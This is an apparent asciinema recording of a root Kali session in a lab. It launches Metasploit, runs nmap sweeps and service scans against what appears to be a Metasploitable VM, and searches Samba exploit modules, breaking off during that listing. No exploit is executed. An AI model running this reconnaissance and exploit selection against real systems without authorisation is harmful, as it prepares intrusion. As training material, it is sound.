{"version": 2, "width": 188, "height": 37, "timestamp": 1645004650, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.04022, "o", "                                                                                                                                                                                            \r\r\u001b]0;root@kali: /home/kali\u0007"]
[0.056162, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K\u001b[?1h\u001b="]
[0.056661, "o", "\u001b[?2004h"]
[5.80714, "o", "\u001b[7m\u001b[32mip\u001b[39m\u001b[7m addr show\u001b[27m\r\r\n\u001b[K"]
[5.80719, "o", "\u001b[K"]
[6.248129, "o", "\u001b[A\u001b[4C\u001b[27m\u001b[32mi\u001b[27m\u001b[32mp\u001b[39m\u001b[27m \u001b[27ma\u001b[27md\u001b[27md\u001b[27mr\u001b[27m \u001b[27ms\u001b[27mh\u001b[27mo\u001b[27mw\u001b[1B\r"]
[6.24826, "o", "\u001b[?1l\u001b>"]
[6.251301, "o", "\u001b[?2004l\r\r\n"]
[6.252477, "o", "1: \u001b[36mlo: \u001b[0m<LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\r\n    link/loopback \u001b[33m00:00:00:00:00:00\u001b[0m brd \u001b[33m00:00:00:00:00:00\u001b[0m\r\n    inet \u001b[35m127.0.0.1\u001b[0m/8 scope host lo\r\n       valid_lft forever preferred_lft forever\r\n    inet6 \u001b[34m::1\u001b[0m/128 scope host \r\n       valid_lft forever preferred_lft forever\r\n2: \u001b[36meth0: \u001b[0m<BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state \u001b[32mUP \u001b[0mgroup default qlen 1000\r\n    link/ether \u001b[33m08:00:27:22:88:7d\u001b[0m brd \u001b[33mff:ff:ff:ff:ff:ff\u001b[0m\r\n    inet \u001b[35m10.0.2.15\u001b[0m/24 brd \u001b[35m10.0.2.255 \u001b[0mscope global dynamic noprefixroute eth0\r\n       valid_lft 499sec preferred_lft 499sec\r\n    inet6 \u001b[34mfe80::a00:27ff:fe22:887d\u001b[0m/64 scope link noprefixroute \r\n       valid_lft forever preferred_lft forever\r\n"]
[6.252687, "o", "                                                                                                                                                                                            \r\r\u001b]0;root@kali: /home/kali\u0007\r\n"]
[6.265099, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[6.265284, "o", "\u001b[?1h\u001b="]
[6.265738, "o", "\u001b[?2004h"]
[10.327885, "o", "\u001b[7m\u001b[32msystemctl\u001b[39m\u001b[7m start postgresql.service \u001b[27m"]
[10.772972, "o", "\u001b[35D\u001b[27m\u001b[32ms\u001b[27m\u001b[32my\u001b[27m\u001b[32ms\u001b[27m\u001b[32mt\u001b[27m\u001b[32me\u001b[27m\u001b[32mm\u001b[27m\u001b[32mc\u001b[27m\u001b[32mt\u001b[27m\u001b[32ml\u001b[39m\u001b[27m \u001b[27ms\u001b[27mt\u001b[27ma\u001b[27mr\u001b[27mt\u001b[27m \u001b[27mp\u001b[27mo\u001b[27ms\u001b[27mt\u001b[27mg\u001b[27mr\u001b[27me\u001b[27ms\u001b[27mq\u001b[27ml\u001b[27m.\u001b[27ms\u001b[27me\u001b[27mr\u001b[27mv\u001b[27mi\u001b[27mc\u001b[27me\u001b[27m "]
[10.773026, "o", "\u001b[?1l\u001b>"]
[10.775672, "o", "\u001b[?2004l\r\r\n"]
[10.779873, "o", "                                                                                                                                                                                            \r\r\u001b]0;root@kali: /home/kali\u0007\r\n"]
[10.792795, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K\u001b[?1h\u001b="]
[10.793041, "o", "\u001b[?2004h"]
[14.521425, "o", "\u001b[7m\u001b[32mmsfdb\u001b[39m\u001b[7m init\u001b[27m"]
[14.87658, "o", "\u001b[10D\u001b[27m\u001b[32mm\u001b[27m\u001b[32ms\u001b[27m\u001b[32mf\u001b[27m\u001b[32md\u001b[27m\u001b[32mb\u001b[39m\u001b[27m \u001b[27mi\u001b[27mn\u001b[27mi\u001b[27mt"]
[14.876731, "o", "\u001b[?1l\u001b>"]
[14.878244, "o", "\u001b[?2004l\r\r\n"]
[14.887259, "o", "\u001b[01;33m[i]\u001b[00m Database already started\r\n"]
[14.887403, "o", "\u001b[01;33m[i]\u001b[00m The database appears to be already configured, skipping initialization\r\n"]
[14.887702, "o", "                                                                                                                                                                                            \r\r\u001b]0;root@kali: /home/kali\u0007"]
[14.8878, "o", "\r\n"]
[14.900013, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[34m┌──(\u001b[1m\u001b[34m\u001b[31mroot💀kali\u001b[0m\u001b[31m\u001b[34m)-[\u001b[1m\u001b[34m\u001b[39m/home/kali\u001b[0m\u001b[34m]\r\n└─\u001b[1m\u001b[34m\u001b[31m#\u001b[0m\u001b[31m\u001b[39m \u001b[K"]
[14.900139, "o", "\u001b[?1h\u001b="]
[14.900575, "o", "\u001b[?2004h"]
[18.634669, "o", "\u001b[7m\u001b[32mmsfconsole\u001b[27m\u001b[39m"]
[18.956953, "o", "\u001b[10D\u001b[27m\u001b[32mm\u001b[27m\u001b[32ms\u001b[27m\u001b[32mf\u001b[27m\u001b[32mc\u001b[27m\u001b[32mo\u001b[27m\u001b[32mn\u001b[27m\u001b[32ms\u001b[27m\u001b[32mo\u001b[27m\u001b[32ml\u001b[27m\u001b[32me\u001b[39m"]
[18.957094, "o", "\u001b[?1l\u001b>"]
[18.958138, "o", "\u001b[?2004l\r\r\n"]
[23.386242, "o", "[*] Starting the Metasploit Framework console.../\r"]
[23.497307, "o", "[*] Starting the Metasploit Framework console...-\r"]
[23.75984, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[23.864991, "o", "[*] starting the Metasploit Framework console...|\r"]
[24.022378, "o", "[*] STarting the Metasploit Framework console.../\r"]
[24.161045, "o", "[*] StArting the Metasploit Framework console...-\r"]
[24.277594, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[24.400747, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[24.501647, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[24.616896, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[24.738021, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[24.838513, "o", "[*] Starting the Metasploit Framework console...|\r"]
[24.979003, "o", "[*] Starting The Metasploit Framework console.../\r"]
[25.080669, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[25.219302, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[25.318986, "o", "\r                                                  \r\n"]
[25.319362, "o", "\u001b[0m"]
[25.324591, "o", "\u001b[36m  \u001b[37m+-------------------------------------------------------+\r\n  \u001b[37m|  METASPLOIT by Rapid7                                 |\r\n  \u001b[37m+---------------------------+---------------------------+\r\n  \u001b[37m|      \u001b[34m__________________   \u001b[37m|                           |\r\n  \u001b[37m|  \u001b[33m==c\u001b[34m(______(\u001b[33mo\u001b[34m(______(_\u001b[33m()  \u001b[37m| \u001b[32m|\"\"\"\"\"\"\"\"\"\"\"\"|======[\u001b[31m***  \u001b[37m|\r\n  \u001b[37m|             \u001b[34m)\u001b[33m=\u001b[34m\\           \u001b[37m| \u001b[32m|  \u001b[37mEXPLOIT   \u001b[32m\\            \u001b[37m|\r\n  \u001b[37m|            \u001b[34m// \\\\          \u001b[37m| \u001b[32m|_____________\\_______    \u001b[37m|\r\n  \u001b[37m|           \u001b[34m//   \\\\         \u001b[37m| \u001b[32m|==[\u001b[37mmsf >\u001b[32m]============\\   \u001b[37m|\r\n  \u001b[37m|          \u001b[34m//     \\\\        \u001b[37m| \u001b[32m|______________________\\  \u001b[37m|\r\n  \u001b[37m|         \u001b[34m// \u001b[37mRECON \u001b[34m\\\\       \u001b[37m| \u001b[32m\\(@)(@)(@)(@)(@)(@)(@)/   \u001b[37m|\r\n  \u001b[37m|        \u001b[34m//         \\\\      \u001b[37m|  \u001b[32m*********************    \u001b[37m|\r\n  \u001b[37m+---------------------------+---------------------------+\r\n  \u001b[37m|    "]
[25.324727, "o", "  o O o                |        \u001b[33m\\'\\/\\/\\/'/         \u001b[37m|\r\n  \u001b[37m|              o O          |         \u001b[33m)\u001b[37m======\u001b[33m(          \u001b[37m|\r\n  \u001b[37m|                 o         |       \u001b[33m.'  \u001b[37mLOOT  \u001b[33m'.        \u001b[37m|\r\n  \u001b[37m| \u001b[31m|^^^^^^^^^^^^^^|l\u001b[31m___      \u001b[37m|      \u001b[33m/    \u001b[32m_||__   \u001b[33m\\       \u001b[37m|\r\n  \u001b[37m| \u001b[31m|    \u001b[37mPAYLOAD     \u001b[31m|\u001b[37m\"\"\\\u001b[31m___, \u001b[37m|     \u001b[33m/    \u001b[32m(_||_     \u001b[33m\\      \u001b[37m|\r\n  \u001b[37m| \u001b[31m|________________|__|)__| \u001b[37m|    \u001b[33m|     \u001b[32m__||_)     \u001b[33m|     \u001b[37m|\r\n  \u001b[37m| \u001b[31m|(@)(@)\"\"\"**|(@)(@)**|(@) \u001b[37m|    \u001b[33m\"       \u001b[32m||       \u001b[33m\"     \u001b[37m|\r\n  \u001b[37m|  \u001b[33m= = = = = = = = = = = =  \u001b[37m|     \u001b[33m'--------------'      \u001b[37m|\r\n  \u001b[37m+---------------------------+---------------------------+\u001b[0m\r\n\u001b[0m\r\n\r\n       =[ \u001b[33mmetasploit v6.1.28-dev\u001b[0m                          ]\r\n+ -- --=[ 2197 exploits - 1163 auxiliary - 400 post       ]\r\n+ -- --=[ 596 payloads - 45 encoders - 11 nops            ]\r\n+ -- --=[ 9 evasion    "]
[25.324761, "o", "                                   ]\r\n\r\nMetasploit tip: You can upgrade a shell to a Meterpreter \r\nsession on many platforms using \u001b[32msessions -u \r\n<session_id>\u001b[0m\r\n\r\n"]
[25.379579, "o", "\u001b[?1034h"]
[25.403046, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[27.410936, "o", "d"]
[27.411058, "o", "b"]
[27.411084, "o", "_"]
[27.411285, "o", "n"]
[27.411386, "o", "m"]
[27.41147, "o", "a"]
[27.411494, "o", "p"]
[27.411618, "o", " "]
[27.411705, "o", "1"]
[27.411798, "o", "0"]
[27.411921, "o", "."]
[27.41201, "o", "0"]
[27.412113, "o", "."]
[27.412226, "o", "2"]
[27.412331, "o", "."]
[27.412453, "o", "0"]
[27.412551, "o", "/"]
[27.412673, "o", "2"]
[27.412792, "o", "4"]
[27.412935, "o", " "]
[27.413122, "o", "-"]
[27.413246, "o", "s"]
[27.413399, "o", "n"]
[27.773874, "o", "\r\r\n"]
[27.779575, "o", "\u001b[0m"]
[27.793116, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 04:44 EST\r\n"]
[30.082888, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.1\r\n"]
[30.083103, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.00012s latency).\r\n"]
[30.083357, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)\r\n"]
[30.083529, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.2\r\n"]
[30.083729, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.000099s latency).\r\n"]
[30.083909, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 52:54:00:12:35:00 (QEMU virtual NIC)\r\n"]
[30.084121, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.3\r\n"]
[30.084343, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.000093s latency).\r\n"]
[30.08452, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 08:00:27:DC:DA:28 (Oracle VirtualBox virtual NIC)\r\n"]
[30.08481, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.8\r\n"]
[30.085012, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.00025s latency).\r\n"]
[30.085171, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 08:00:27:8D:C9:FA (Oracle VirtualBox virtual NIC)\r\n"]
[30.085337, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.15\r\n"]
[30.085517, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up.\r\n"]
[30.085712, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap done: 256 IP addresses (5 hosts up) scanned in 2.29 seconds\r\n"]
[30.219134, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[32.52547, "o", "p"]
[32.525516, "o", "i"]
[32.525596, "o", "n"]
[32.525702, "o", "g"]
[32.525765, "o", " "]
[32.525875, "o", "1"]
[32.526019, "o", "0."]
[32.526137, "o", "0"]
[32.526229, "o", "."]
[32.526348, "o", "2"]
[32.526445, "o", "."]
[32.526513, "o", "8"]
[32.526674, "o", " "]
[32.526846, "o", "-c"]
[32.527006, "o", " "]
[32.527197, "o", "4"]
[33.744032, "o", "\r\r\n"]
[33.749916, "o", "\u001b[0m"]
[33.750322, "o", "\u001b[1m\u001b[34m[*]\u001b[0m exec: ping 10.0.2.8 -c 4\r\n"]
[33.750511, "o", "\r\n"]
[33.755488, "o", "PING 10.0.2.8 (10.0.2.8) 56(84) bytes of data.\r\n"]
[33.75584, "o", "64 bytes from 10.0.2.8: icmp_seq=1 ttl=64 time=0.242 ms\r\n"]
[34.775586, "o", "64 bytes from 10.0.2.8: icmp_seq=2 ttl=64 time=0.202 ms\r\n"]
[35.802892, "o", "64 bytes from 10.0.2.8: icmp_seq=3 ttl=64 time=0.202 ms\r\n"]
[36.825352, "o", "64 bytes from 10.0.2.8: icmp_seq=4 ttl=64 time=0.209 ms\r\n\r\n--- 10.0.2.8 ping statistics ---\r\n4 packets transmitted, 4 received, 0% packet loss, time 3071ms\r\nrtt min/avg/max/mdev = 0.202/0.213/0.242/0.016 ms\r\n"]
[36.853557, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[38.450704, "o", "d"]
[38.450852, "o", "b"]
[38.450951, "o", "_n"]
[38.451048, "o", "m"]
[38.451211, "o", "a"]
[38.451365, "o", "p"]
[38.451473, "o", " "]
[38.45157, "o", "1"]
[38.451644, "o", "0"]
[38.451752, "o", "."]
[38.451895, "o", "0"]
[38.451998, "o", "."]
[38.452024, "o", "2"]
[38.452159, "o", "."]
[38.452306, "o", "8"]
[38.45242, "o", " "]
[38.452542, "o", "-"]
[38.452656, "o", "P"]
[38.452777, "o", "n"]
[38.452983, "o", " "]
[38.453116, "o", "-"]
[38.453283, "o", "n"]
[38.761854, "o", "\r\r\n"]
[38.767705, "o", "\u001b[0m"]
[38.806026, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 04:44 EST\r\n"]
[38.996464, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.8\r\n"]
[38.996748, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.00031s latency).\r\n"]
[38.996971, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Not shown: 977 closed tcp ports (reset)\r\n"]
[38.997158, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: PORT     STATE SERVICE\r\n"]
[38.997374, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 21/tcp   open  ftp\r\n"]
[38.997602, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 22/tcp   open  ssh\r\n"]
[38.997823, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 23/tcp   open  telnet\r\n"]
[38.998018, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 25/tcp   open  smtp\r\n"]
[38.998173, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 53/tcp   open  domain\r\n"]
[38.998361, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 80/tcp   open  http\r\n"]
[38.998527, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 111/tcp  open  rpcbind\r\n"]
[38.998711, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 139/tcp  open  netbios-ssn\r\n"]
[38.9989, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 445/tcp  open  microsoft-ds\r\n"]
[38.999096, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 512/tcp  open  exec\r\n"]
[38.999433, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 513/tcp  open  login\r\n"]
[38.999619, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 514/tcp  open  shell\r\n"]
[38.999812, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 1099/tcp open  rmiregistry\r\n"]
[39.0, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 1524/tcp open  ingreslock\r\n"]
[39.000184, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 2049/tcp open  nfs\r\n"]
[39.000385, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 2121/tcp open  ccproxy-ftp\r\n"]
[39.000547, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 3306/tcp open  mysql\r\n"]
[39.000746, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 5432/tcp open  postgresql\r\n"]
[39.000932, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 5900/tcp open  vnc\r\n"]
[39.001103, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 6000/tcp open  X11\r\n"]
[39.001291, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 6667/tcp open  irc\r\n"]
[39.001494, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8009/tcp open  ajp13\r\n"]
[39.001688, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8180/tcp open  unknown\r\n"]
[39.001884, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 08:00:27:8D:C9:FA (Oracle VirtualBox virtual NIC)\r\n"]
[39.002061, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds\r\n"]
[39.131078, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[48.563019, "o", "d"]
[48.563152, "o", "b_"]
[48.563299, "o", "n"]
[48.563416, "o", "m"]
[48.563442, "o", "a"]
[48.563566, "o", "p"]
[48.563642, "o", " "]
[48.563733, "o", "1"]
[48.563834, "o", "0"]
[48.563926, "o", "."]
[48.564033, "o", "0"]
[48.564141, "o", "."]
[48.564258, "o", "2"]
[48.564399, "o", "."]
[48.564515, "o", "8"]
[48.564641, "o", " "]
[48.564774, "o", "-"]
[48.564892, "o", "p"]
[48.565027, "o", " "]
[48.565234, "o", "4"]
[48.565412, "o", "4"]
[48.565551, "o", "5"]
[48.565708, "o", ","]
[48.565854, "o", "6"]
[48.566004, "o", "6"]
[48.566166, "o", "6"]
[48.566356, "o", "7"]
[48.566509, "o", " "]
[48.566689, "o", "-"]
[48.566883, "o", "A"]
[48.853724, "o", "\r\r\n"]
[48.859517, "o", "\u001b[0m"]
[49.079619, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-16 04:44 EST\r\n"]
[58.17799, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for 10.0.2.8\r\n"]
[58.178502, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.00021s latency).\r\n"]
[58.178705, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: PORT     STATE SERVICE     VERSION\r\n"]
[58.17895, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\r\n"]
[58.179153, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 6667/tcp open  irc         UnrealIRCd\r\n"]
[58.179371, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | irc-info:\r\n"]
[58.179549, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   users: 1\r\n"]
[58.17977, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   servers: 1\r\n"]
[58.179938, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   lusers: 1\r\n"]
[58.180127, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   lservers: 0\r\n"]
[58.18031, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   server: irc.Metasploitable.LAN\r\n"]
[58.180482, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   version: Unreal3.2.8.1. irc.Metasploitable.LAN\r\n"]
[58.180708, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   uptime: 0 days, 0:02:51\r\n"]
[58.180889, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   source ident: nmap\r\n"]
[58.181111, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   source host: C29CBC04.EB72D3BE.7B559A54.IP\r\n"]
[58.181301, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  error: Closing Link: rohegydom[10.0.2.15] (Quit: rohegydom)\r\n"]
[58.181481, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 08:00:27:8D:C9:FA (Oracle VirtualBox virtual NIC)\r\n"]
[58.181697, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port\r\n"]
[58.181874, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Device type: general purpose\r\n"]
[58.182071, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Running: Linux 2.6.X\r\n"]
[58.182272, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6\r\n"]
[58.182453, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: OS details: Linux 2.6.9 - 2.6.33\r\n"]
[58.182681, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Network Distance: 1 hop\r\n"]
[58.182885, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Service Info: Host: irc.Metasploitable.LAN\r\n"]
[58.183052, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host script results:\r\n"]
[58.183451, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_clock-skew: mean: 2h29m59s, deviation: 3h32m07s, median: 0s\r\n"]
[58.183681, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)\r\n"]
[58.183889, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | smb-security-mode:\r\n"]
[58.184045, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   account_used: guest\r\n"]
[58.184245, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   authentication_level: user\r\n"]
[58.184431, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   challenge_response: supported\r\n"]
[58.184623, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  message_signing: disabled (dangerous, but default)\r\n"]
[58.184819, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_smb2-time: Protocol negotiation failed (SMB2)\r\n"]
[58.185006, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | smb-os-discovery:\r\n"]
[58.185197, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   OS: Unix (Samba 3.0.20-Debian)\r\n"]
[58.185387, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Computer name: metasploitable\r\n"]
[58.185588, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   NetBIOS computer name:\r\n"]
[58.185758, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Domain name: localdomain\r\n"]
[58.185948, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   FQDN: metasploitable.localdomain\r\n"]
[58.186115, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  System time: 2022-02-16T04:45:07-05:00\r\n"]
[58.186289, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: TRACEROUTE\r\n"]
[58.186469, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: HOP RTT     ADDRESS\r\n"]
[58.18667, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 1   0.21 ms 10.0.2.8\r\n"]
[58.186866, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .\r\n"]
[58.187096, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap done: 1 IP address (1 host up) scanned in 9.31 seconds\r\n"]
[58.318271, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[78.03235, "o", "s"]
[78.032486, "o", "e"]
[78.032537, "o", "a"]
[78.032552, "o", "r"]
[78.03265, "o", "c"]
[78.032745, "o", "h"]
[78.032836, "o", " "]
[78.032918, "o", "e"]
[78.033016, "o", "x"]
[78.033148, "o", "p"]
[78.033251, "o", "l"]
[78.033364, "o", "o"]
[78.033475, "o", "i"]
[78.033586, "o", "t"]
[78.033701, "o", " "]
[78.033827, "o", "s"]
[78.033947, "o", "a"]
[78.034077, "o", "m"]
[78.034224, "o", "b"]
[78.034347, "o", "a"]
[78.431235, "o", "\r\r\n"]
[78.436858, "o", "\u001b[0m"]
[78.620867, "o", "\r\nMatching Modules\r\n================\r\n\r\n   #   Name                                                 Disclosure Date  Rank       Check  Description\r\n   -   ----                                                 ---------------  ----       -----  -----------\r\n   0   \u001b[45mexploit\u001b[0m/unix/webapp/citrix_access_gateway_exec       2010-12-21       \u001b[32mexcellent\u001b[0m  Yes    Citrix Access Gateway Command Execution\r\n   1   \u001b[45mexploit\u001b[0m/windows/license/calicclnt_getconfig          2005-03-02       average    No     Computer Associates License Client GETCONFIG Overflow\r\n   2   \u001b[45mexploit\u001b[0m/unix/misc/distcc_exec                        2002-02-01       \u001b[32mexcellent\u001b[0m  Yes    DistCC Daemon Command Execution\r\n   3   \u001b[45mexploit\u001b[0m/windows/smb/group_policy_startup             2015-01-26       manual     No     Group Policy Script Execution From Shared Resource\r\n   4   \u001b[45mexploit\u001b[0m/windows/fileformat/ms14_060_sandworm         2014-10-14       \u001b[32mexcellent\u001b[0m  No     MS14-060 Microsoft Windows OLE Package M"]
[78.620997, "o", "anager Code Execution\r\n   5   \u001b[45mexploit\u001b[0m/unix/http/quest_kace_systems_management_rce  2018-05-31       \u001b[32mexcellent\u001b[0m  Yes    Quest KACE Systems Management Command Injection\r\n   6   \u001b[45mexploit\u001b[0m/multi/\u001b[45msamba\u001b[0m/usermap_script                   2007-05-14       \u001b[32mexcellent\u001b[0m  No     \u001b[45mSamba\u001b[0m \"username map script\" Command Execution\r\n   7   \u001b[45mexploit\u001b[0m/multi/\u001b[45msamba\u001b[0m/nttrans                          2003-04-07       average    No     \u001b[45mSamba\u001b[0m 2.2.2 - 2.2.6 nttrans Buffer Overflow\r\n   8   \u001b[45mexploit\u001b[0m/linux/\u001b[45msamba\u001b[0m/setinfopolicy_heap               2012-04-10       normal     Yes    \u001b[45mSamba\u001b[0m SetInformationPolicy AuditEventsInfo Heap Overflow\r\n   9   auxiliary/admin/smb/\u001b[45msamba\u001b[0m_symlink_traversal                           normal     No     \u001b[45mSamba\u001b[0m Symlink Directory Traversal\r\n   10  \u001b[45mexploit\u001b[0m/linux/\u001b[45msamba\u001b[0m/chain_reply                      2010-06-16       good       No     \u001b[45mSamba\u001b[0m chain_reply Memory Corruption (Linux x"]
